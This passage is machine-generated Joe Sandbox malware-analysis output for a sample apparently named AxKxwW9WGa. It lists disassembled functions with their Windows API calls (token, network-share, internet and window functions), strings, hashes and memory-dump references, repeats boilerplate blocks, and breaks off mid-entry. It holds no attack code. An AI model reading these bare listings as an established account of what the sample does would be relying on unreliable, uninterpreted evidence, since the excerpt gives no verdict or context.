Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: 3f6219cbe9144fe0b5091f573e6a24f49899642c6977f083de8604946d0fd00c
Instruction ID: 2dfd27b841cfba18cddadeb999e86f5d45ac722031beb3244be938e8652d3a68
Opcode Fuzzy Hash: 3f6219cbe9144fe0b5091f573e6a24f49899642c6977f083de8604946d0fd00c
Instruction Fuzzy Hash: ACE03031104544AADB615FA4EC0DBD93B11EB05332F148376FA69480E187B54984DB55

Function 00498712 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 0049871B
OpenThreadToken.ADVAPI32(00000000,?,?,?,004982E6), ref: 00498722
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,004982E6), ref: 0049872F
OpenProcessToken.ADVAPI32(00000000,?,?,?,004982E6), ref: 00498736

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 21b6bd19c037cb07d66099d1db732534a5feb83aa381f8a1ea3f3a9aec18e446
Instruction ID: a12cfc444bc5871a5505dc29966508f6046fb401b9f5e967ee38fc0445580f77
Opcode Fuzzy Hash: 21b6bd19c037cb07d66099d1db732534a5feb83aa381f8a1ea3f3a9aec18e446
Instruction Fuzzy Hash: C4E02632601211ABDBA01FF15C0CF473BAEEF11B91F104878B641CA040DA3C8449C714

Function 00446240 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 317COMMON

Download Yara Rule

Strings

%M, xrefs: 0044624E

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID:
String ID: %M
API String ID: 0-78608726
Opcode ID: b092fed1f6be117b30ad01ad66b998d300a4a315d116b56543d44c763b646696
Instruction ID: 80e0688cd1e470132151987c0ff473061af0d9dde7f03799781cf765472d7a0b
Opcode Fuzzy Hash: b092fed1f6be117b30ad01ad66b998d300a4a315d116b56543d44c763b646696
Instruction Fuzzy Hash: CAB1AF719001099BEF14EF94C4819FEB7B5FF46314F11812BE906A7291DB389E86CB9E

Function 004BAEA2 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 313COMMON

Download Yara Rule

APIs

__itow_s.LIBCMT ref: 004BAFAE

Strings

xbP, xrefs: 004BB010
xbP, xrefs: 004BAFE4

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: __itow_s
String ID: xbP$xbP
API String ID: 3653519197-1993767416
Opcode ID: f97a9ae502a853226575ece107175c090821f759817178e1c9acbad0bd5488eb
Instruction ID: 13791d14be33264cd7df61e43d629567997d174b8bf8653995971612571d25f3
Opcode Fuzzy Hash: f97a9ae502a853226575ece107175c090821f759817178e1c9acbad0bd5488eb
Instruction Fuzzy Hash: BBB19F70A00109EFDB10DF59C890EFABBB9FF58344F14805AF9459B291EB78D941CBA8

Function 004AAFAC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON

Download Yara Rule

APIs

Part of subcall function 0045FC86: _wcscpy.LIBCMT ref: 0045FCA9

Part of subcall function 00449837: __itow.LIBCMT ref: 00449862
Part of subcall function 00449837: __swprintf.LIBCMT ref: 004498AC

__wcsnicmp.LIBCMT ref: 004AB02D
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 004AB0F6

Strings

LPT, xrefs: 004AB027

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: 2156d9d7ad4756b482de9dc1b95894a725cddf38c72a8cb817e44e7d0183dcd6
Instruction ID: 35df9a118ae7b693d1aaab64b6164d1a6ef4450dd6634d0ef3e487d513966e38
Opcode Fuzzy Hash: 2156d9d7ad4756b482de9dc1b95894a725cddf38c72a8cb817e44e7d0183dcd6
Instruction Fuzzy Hash: 8A61A271A00214AFDB14DF94C851EAFB7B4EF19310F00406EF916AB352D738AE44CB99

Function 00452957 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00452968
GlobalMemoryStatusEx.KERNEL32(?), ref: 00452981

Strings

@, xrefs: 00452975

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 446fd3c3fb34560782aea5e153a4210745b3f8fa2d92e61760173782493084f9
Instruction ID: 70aaa929cbf02019fd8d60dc3dc040c94c4f4cfa6243c7afb6c16756767b6919
Opcode Fuzzy Hash: 446fd3c3fb34560782aea5e153a4210745b3f8fa2d92e61760173782493084f9
Instruction Fuzzy Hash: DD515A714187449BE320EF15D885BAFB7E8FF85344F42485EF1D8411A2DB34892CCB5A

Function 004A9734 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00444F0B: __fread_nolock.LIBCMT ref: 00444F29

_wcscmp.LIBCMT ref: 004A9824
_wcscmp.LIBCMT ref: 004A9837

Strings

FILE, xrefs: 004A9770

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: 11206e172d7e1cceda633a415a1fbb8debe0ee2cb3eb3995cc104c53f7e79f1f
Instruction ID: fb323c7a647f8a90448a7b19504c6cfd165cc00037249e6f26ef2821f0cb302f
Opcode Fuzzy Hash: 11206e172d7e1cceda633a415a1fbb8debe0ee2cb3eb3995cc104c53f7e79f1f
Instruction Fuzzy Hash: 3E41D931A10219BAEF20AEA1CC45FEFB7BDDF86714F00006FF904A7181D6799E048B69

Function 00480574 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 0048057F

Strings

DdP, xrefs: 0044A317
DdP, xrefs: 0044A151

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: ClearVariant
String ID: DdP$DdP
API String ID: 1473721057-3026710193
Opcode ID: 2ff33bd6c7063ac8f5fbca4d5782b04f18eb8a796f202f841e255f74d1d1389f
Instruction ID: 008b06501ed5b6e9503c9368c0c1dc0a20eee7307942e198ec255e6b4db62c81
Opcode Fuzzy Hash: 2ff33bd6c7063ac8f5fbca4d5782b04f18eb8a796f202f841e255f74d1d1389f
Instruction Fuzzy Hash: 685112786043028FEB50CF18C480A1ABBF1BB99344F54885EE9858B321E339ECA5DF46

Function 004B258E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004B259E
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 004B25D4

Strings

|, xrefs: 004B25A5

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: d26e0a0957fbc390de1e0fa183d1acc3216f5b367db6b2eb8d50fcaa160b97b3
Instruction ID: a6fa4840ee3a37d3f9d845fd2effe642eabbe9f606924dab99d772a57397ae6d
Opcode Fuzzy Hash: d26e0a0957fbc390de1e0fa183d1acc3216f5b367db6b2eb8d50fcaa160b97b3
Instruction Fuzzy Hash: 54313971800119EBDF01EFA1CC85EEEBFB8FF08314F10406AF914A6262EB795956DB64

Function 004C7A71 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 004C7B61
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 004C7B76

Strings

', xrefs: 004C7ACA

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: ba1c13a8e095dbb9c578890f66736df025c7703f0e6f1dfb7cb246f0966473be
Instruction ID: 8e4875468a71ef52b17d037a805b04792f9f37720a026029a0db9c6798cece11
Opcode Fuzzy Hash: ba1c13a8e095dbb9c578890f66736df025c7703f0e6f1dfb7cb246f0966473be
Instruction Fuzzy Hash: 58411678A0420A9FDB54CF64C980FEABBB9FF08304F10416EE904AB381E775A951CF94

Function 004C6A63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 004C6B17
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 004C6B53

Strings

static, xrefs: 004C6AB3

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 0b344a0c20b0c1ef6cc879b31dcfd03e45ad202154ea3a24211398bdc8c2f06c
Instruction ID: e331e317a75079cb39a6a100e2103362fb50efec677cda90705d58428c9cf4a8
Opcode Fuzzy Hash: 0b344a0c20b0c1ef6cc879b31dcfd03e45ad202154ea3a24211398bdc8c2f06c
Instruction Fuzzy Hash: 4831C175100204AEEB509F64CC40FFB73A9FF48314F10812EF895D3190DA39AC41DB68

Function 004A28A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004A2911
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 004A294C

Strings

0, xrefs: 004A290A

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 45341a5fcbde468c7f9f47634a809e90ff46566762b7d17587aa7b30a23ab7fd
Instruction ID: a99bd6fdd337934b82a64374304a891d69d8292e956ed3695a5ec4f76ddd477e
Opcode Fuzzy Hash: 45341a5fcbde468c7f9f47634a809e90ff46566762b7d17587aa7b30a23ab7fd
Instruction Fuzzy Hash: A831FCB1700305ABDB24CF4CCA45BAFBBFCEF56750F14001AED81962A0E7B89945EB19

Function 004C66D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 004C6761
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004C676C

Strings

Combobox, xrefs: 004C672E

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 06dc0131ad0d6b0d0847810aac5daeb0a9645b606072ec3c5125e043407db3e6
Instruction ID: 71dfd76328157ba3221ecc55b3f86aa9ac1bfdd6b7d8544ce3a0d97373f3d545
Opcode Fuzzy Hash: 06dc0131ad0d6b0d0847810aac5daeb0a9645b606072ec3c5125e043407db3e6
Instruction Fuzzy Hash: 0411B279301208AFEF519F54CC81FBB376AEB483A8F11852EF91897390D639DC519BA4

Function 004C6C07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00441D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00441D73
Part of subcall function 00441D35: GetStockObject.GDI32(00000011), ref: 00441D87
Part of subcall function 00441D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00441D91

GetWindowRect.USER32(00000000,?), ref: 004C6C71
GetSysColor.USER32(00000012), ref: 004C6C8B

Strings

static, xrefs: 004C6C4E

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: cf343f6c93ad396dc73e15cf00e3b95d982295bff2e18d928481401d42a1d44f
Instruction ID: ec2b3eafdb8643f4c936a8a50adf6e8269bd9add270f0b1f930b64619c126082
Opcode Fuzzy Hash: cf343f6c93ad396dc73e15cf00e3b95d982295bff2e18d928481401d42a1d44f
Instruction Fuzzy Hash: F02159B6610209AFDF04DFA8CC45EFA7BA9FB08304F01462DFD95D2251D639E861DB64

Function 004C6920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 004C69A2
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004C69B1

Strings

edit, xrefs: 004C6986

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 19d4486d9f21d04e8f56e38025b08376f0dd6977bb7d240adc64f98f3a9ddde1
Instruction ID: 669152e7980e4447a03fb51bbb5f89c50fdf8992fcf985e0e43f5391ff4615a7
Opcode Fuzzy Hash: 19d4486d9f21d04e8f56e38025b08376f0dd6977bb7d240adc64f98f3a9ddde1
Instruction Fuzzy Hash: B011BFB5100108ABEF908E64DC40FEB376AEB05378F51872AF9A1972E0C739DC55A768

Function 004A29AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004A2A22
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 004A2A41

Strings

0, xrefs: 004A2A18

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: b959025aac483e90b28fbeb1427224dafec198b8c0e62d847ef133ff924d4c14
Instruction ID: 010370d82fe6251612d59e8d8e3863726a4d5119741d7246964be852f19a0310
Opcode Fuzzy Hash: b959025aac483e90b28fbeb1427224dafec198b8c0e62d847ef133ff924d4c14
Instruction Fuzzy Hash: 91110A31A00115ABDF30DA5CDA44B9F73B8AB5A300F144023EC55E7350D7B49D0AE799

Function 004B21D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004B222C
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 004B2255

Strings

<local>, xrefs: 004B221D

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: a373f8a0496ca6ed0f342364a73940f71e6e5147d0e86aeb73865373fa074011
Instruction ID: 2488f681b9befc777283c90c3f65a845207cf23acbbf7ebe77889a6e6c6fadca
Opcode Fuzzy Hash: a373f8a0496ca6ed0f342364a73940f71e6e5147d0e86aeb73865373fa074011
Instruction Fuzzy Hash: 6F110270501225BADB288F518D84EFBFBA8FF06351F10866BF90496100D3B85895D6F5

Function 0045092D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00443C14,005052F8,?,?,?), ref: 0045096E

Part of subcall function 00447BCC: _memmove.LIBCMT ref: 00447C06

_wcscat.LIBCMT ref: 00484CB7

Strings

SP, xrefs: 004509AE

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: FullNamePath_memmove_wcscat
String ID: SP
API String ID: 257928180-516738047
Opcode ID: ec1b1ef6ec6e02de0a711ad8516624c864cce535bffc73cab8a2096893d551a7
Instruction ID: 7ce943ef8cc242f71ffc4c8373f588a0792da667437c6e62f1b4205907ffceb2
Opcode Fuzzy Hash: ec1b1ef6ec6e02de0a711ad8516624c864cce535bffc73cab8a2096893d551a7
Instruction Fuzzy Hash: 0711E9B49006099BDB40FF64C801ECE7BE8FF08345B0044ABBD48D3286EA78A68C4B19

Function 00498E05 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00447DE1: _memmove.LIBCMT ref: 00447E22

Part of subcall function 0049AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0049AABC

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00498E73

Strings

ComboBox, xrefs: 00498E12
ListBox, xrefs: 00498E3D

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 9f55aca56004058b796bd90d253fe309ede4b77538d73b91ac02a6afc43f34d5
Instruction ID: e73e9817a7ad3dc414541227d0eb84ae103b29d2566b4bf5d22ce01ea600a03f
Opcode Fuzzy Hash: 9f55aca56004058b796bd90d253fe309ede4b77538d73b91ac02a6afc43f34d5
Instruction Fuzzy Hash: 4C01F5B1A01219AB9F14FBA5CC519FE7769AF06320B10062FF821973D2DE3D5809C658

Function 004A8D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 004A8DAC
__fread_nolock.LIBCMT ref: 004A8DC1

Strings

